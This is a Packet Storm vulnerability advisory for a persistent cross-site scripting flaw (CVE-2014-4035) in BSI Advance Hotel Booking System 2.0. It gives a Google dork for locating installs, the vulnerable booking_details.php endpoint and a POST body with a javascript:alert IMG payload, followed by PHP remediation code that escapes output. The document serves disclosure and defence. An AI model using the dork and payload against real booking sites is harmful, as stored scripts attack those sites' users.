Source: packetstorm | Author: Angelo Ruwantha | ID: PACKETSTORM:154024
Aug 12, 2019 - 12:00 a.m.

BSI Advance Hotel Booking System 2.0 Cross Site Scripting

2019-08-12 00:00:00
Angelo Ruwantha
packetstormsecurity.com

EPSS: 0.002 (Low), percentile 57.5%

```
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035

Vulnerability
========================

[+]Method:POST

1.http://URL/hotel-booking/booking_details.php (;persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


every parameter injectable :)
```
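Since the advisory reports that every field posted to `booking_details.php` is stored and rendered unescaped, the mitigation is to encode each stored value where it enters markup. The sketch below is an added example, not the vendor's or the advisory author's code: the field names come from the POST body above, while the function names, the 255-character cap and the availability of the `mbstring` extension are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the vendor's code. Field names are the POST parameters
// listed in the advisory; the function names are hypothetical.
const BOOKING_FIELDS = ['title', 'fname', 'lname', 'str_addr', 'city', 'state',
    'zipcode', 'country', 'phone', 'fax', 'email', 'payment_type', 'message'];

// Encode for an HTML text or quoted-attribute context at output time.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input handling: keep only known fields, force strings, strip control
// characters, cap length. This limits what is stored; it does not replace e().
function clean_booking(array $post): array
{
    $clean = [];
    foreach (BOOKING_FIELDS as $name) {
        $raw = $post[$name] ?? '';
        $raw = is_string($raw) ? $raw : '';   // drop array parameters such as title[]=
        $raw = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $raw) ?? '';
        $clean[$name] = mb_substr(trim($raw), 0, 255, 'UTF-8'); // assumed cap
    }
    if ($clean['email'] !== '' && filter_var($clean['email'], FILTER_VALIDATE_EMAIL) === false) {
        $clean['email'] = '';
    }
    return $clean;
}

// Output: every stored value passes through e() before it is placed in markup.
function render_booking_rows(array $booking): string
{
    $rows = '';
    foreach ($booking as $name => $value) {
        $rows .= '<tr><th>' . e((string) $name) . '</th><td>' . e((string) $value) . "</td></tr>\n";
    }
    return $rows;
}

// Constructed request reusing the title value shown in the advisory.
$post = ['title' => '<IMG SRC="javascript:alert(\'HelloWorld ;)\');"', 'fname' => 'Test'];
echo render_booking_rows(clean_booking($post));
```

Run with `php` on the command line, the `title` row comes out with `<`, `>` and both quote characters as HTML entities, so a browser displays the submitted text instead of parsing it as a tag.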
